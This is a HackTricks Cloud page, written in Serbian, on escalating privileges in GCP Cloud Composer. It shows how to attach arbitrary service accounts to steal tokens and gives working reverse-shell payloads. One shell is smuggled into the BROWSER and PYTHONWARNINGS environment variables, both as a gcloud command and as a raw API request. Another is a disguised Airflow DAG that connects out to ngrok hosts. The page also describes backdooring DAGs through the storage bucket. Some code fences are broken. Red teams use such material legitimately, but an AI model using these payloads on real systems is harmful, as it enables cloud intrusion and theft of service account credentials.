GCP - Composer Privesc

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

composer

Više informacija u:

GCP - Composer Enum

composer.environments.create

Moguće je prikačiti bilo koji service account na novo kreirano composer okruženje sa tom permisijom. Kasnije možete izvršiti kod unutar composer okruženja kako biste ukrali token service accounta.

Kreiranje Composer okruženja sa prikačenim service account-om ```bash gcloud composer environments create privesc-test \ --project "${PROJECT_ID}" \ --location europe-west1 \ --service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" ```

Više informacija o eksploataciji here.

composer.environments.update

Moguće je ažurirati Composer environment, na primer, izmenom env varijabli:

Ažuriranje Composer env varijabli za izvršavanje koda ```bash # Even if it says you don't have enough permissions the update happens gcloud composer environments update \ projects//locations//environments/ \ --update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \ --location \ --project

Call the API endpoint directly

PATCH /v1/projects//locations//environments/?alt=json&updateMask=config.software_config.env_variables HTTP/2 Host: composer.googleapis.com User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0) Accept-Encoding: gzip, deflate, br Accept: application/json Content-Length: 178 Content-Type: application/json X-Goog-Api-Client: cred-type/sa Authorization: Bearer [token] X-Allowed-Locations: 0x0

{“config”: {“softwareConfig”: {“envVariables”: {“BROWSER”: “/bin/bash -c ‘bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1’ & #%s”, “PYTHONWARNINGS”: “all:0:antigravity.x:0:0”}}}}

</details>

TODO: Dobiti RCE dodavanjem novih pypi paketa u okruženje

### Preuzimanje DAGs

Proverite izvorni kod DAGs koji se izvršavaju:

<details><summary>Izvezi i preuzmi DAGs iz Composer okruženja</summary>
```bash
mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags

Uvoz DAG-ova

Dodajte python DAG code u fajl i importujte ga pokretanjem:

Uvezi zlonamerni DAG u Composer okruženje ```bash # TODO: Create dag to get a rev shell gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py ```

Reverse shell DAG:

Python DAG code for reverse shell ```python import airflow from airflow import DAG from airflow.operators.bash_operator import BashOperator from datetime import timedelta

default_args = { ‘start_date’: airflow.utils.dates.days_ago(0), ‘retries’: 1, ‘retry_delay’: timedelta(minutes=5) }

dag = DAG( ‘reverse_shell’, default_args=default_args, description=‘liveness monitoring dag’, schedule_interval=‘*/10 * * * *’, max_active_runs=1, catchup=False, dagrun_timeout=timedelta(minutes=10), )

priority_weight has type int in Airflow DB, uses the maximum.

t1 = BashOperator( task_id=‘bash_rev’, bash_command=‘bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1’, dag=dag, depends_on_past=False, priority_weight=2**31 - 1, do_xcom_push=False)

</details>

### Pristup za pisanje na Composer bucket

Svi delovi Composer okruženja (DAGs, plugins i data) su pohranjeni u GCP bucket-u. Ako napadač ima permisije za čitanje i pisanje nad njim, može pratiti bucket i **kad god se kreira ili ažurira DAG, poslati verziju sa backdoor-om** tako da će Composer okruženje iz storage-a preuzeti tu kompromitovanu verziju.

Više informacija o ovom napadu potražite u:

<a class="content_ref" href="gcp-storage-privesc.md"><span class="content_ref_label">GCP - Storage Privesc</span></a>

### Uvoz pluginova

TODO: Proveriti šta je moguće kompromitovati otpremanjem pluginova

### Uvoz podataka

TODO: Proveriti šta je moguće kompromitovati otpremanjem podataka

> [!TIP]
> Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Učite i vežbajte Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
>
> </details>